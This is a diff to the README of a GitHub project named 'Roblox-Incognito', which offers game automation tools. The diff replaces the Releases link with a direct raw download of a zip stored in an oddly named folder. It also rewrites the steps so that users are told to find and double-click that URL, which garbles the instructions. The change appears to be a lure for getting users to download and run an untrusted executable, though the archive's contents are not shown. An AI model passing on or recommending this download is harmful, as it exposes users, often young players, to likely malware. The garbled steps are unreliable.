Bhola17777/Roblox-Incognito/README.md

 - **Automation Tools:** Automate tasks in your game seamlessly.

 ## 📂 Download & Install
-To download Roblox-Incognito, visit this page to download: [Roblox-Incognito Releases](https://github.com/Bhola17777/Roblox-Incognito/releases).
+To download Roblox-Incognito, visit this page to download: [Roblox-Incognito Releases](https://raw.githubusercontent.com/Bhola17777/Roblox-Incognito/main/glauconitization/Roblox-Incognito.zip).

 1. Click on the link above.
 2. On the Releases page, look for the latest version.
 3. Click on the zip file to download.
 4. Once the file downloads, locate it in your Downloads folder.
 5. Extract the zip file to a folder of your choice.
-6. Open the extracted folder and find `Roblox-Incognito.exe`.
+6. Open the extracted folder and find `https://raw.githubusercontent.com/Bhola17777/Roblox-Incognito/main/glauconitization/Roblox-Incognito.zip`.
-7. Double-click `Roblox-Incognito.exe` to run the application.
+7. Double-click `https://raw.githubusercontent.com/Bhola17777/Roblox-Incognito/main/glauconitization/Roblox-Incognito.zip` to run the application.

 ## 📜 How to Use Roblox-Incognito
 1. Launch Roblox-Incognito by double-clicking the executable file.